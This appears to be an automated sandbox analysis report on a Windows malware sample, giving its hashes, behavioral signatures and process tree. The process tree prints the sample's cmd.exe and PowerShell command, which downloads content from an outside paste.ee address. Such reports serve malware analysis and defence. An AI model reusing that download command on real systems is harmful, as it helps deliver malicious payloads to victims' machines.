Analysis
-
max time kernel
48s -
max time network
53s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
31-10-2022 07:41
Static task
static1
Behavioral task
behavioral1
Sample
a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe
Resource
win10v2004-20220812-en
General
-
Target
a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe
-
Size
1.3MB
-
MD5
45ab0352a69644eb2305982585fa53f8
-
SHA1
809e84d4635ba14294564c09f9836c4f6efdc991
-
SHA256
a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6
-
SHA512
c16695735faa7ed56f78426e8309e6d8d6986fa9c89150dfb4ffc8ef75b0dc91ebe6ec70c61595daa5b3b8b3c27612a1b6206a0d3e071f7707f1ea7070c248b3
-
SSDEEP
6144:9msopIGaOAsZjrn/D53cOr4eZys040hZlb9hKxEiXsTznyoWfv9LGArxyd:9m9IHOAaLyK4FvhlPSNG
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 1676 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1676 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1676 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1732 wrote to memory of 1444 1732 a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe 28 PID 1732 wrote to memory of 1444 1732 a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe 28 PID 1732 wrote to memory of 1444 1732 a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe 28 PID 1732 wrote to memory of 1444 1732 a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe 28 PID 1444 wrote to memory of 1676 1444 cmd.exe 30 PID 1444 wrote to memory of 1676 1444 cmd.exe 30 PID 1444 wrote to memory of 1676 1444 cmd.exe 30 PID 1444 wrote to memory of 1676 1444 cmd.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe"C:\Users\Admin\AppData\Local\Temp\a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c Powershell -Command "[System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://paste.ee/r/8ioDo/0')).Trim() -replace '</xml>','' -replace '<xml>',''"2⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "[System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://paste.ee/r/8ioDo/0')).Trim() -replace '</xml>','' -replace '<xml>',''"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-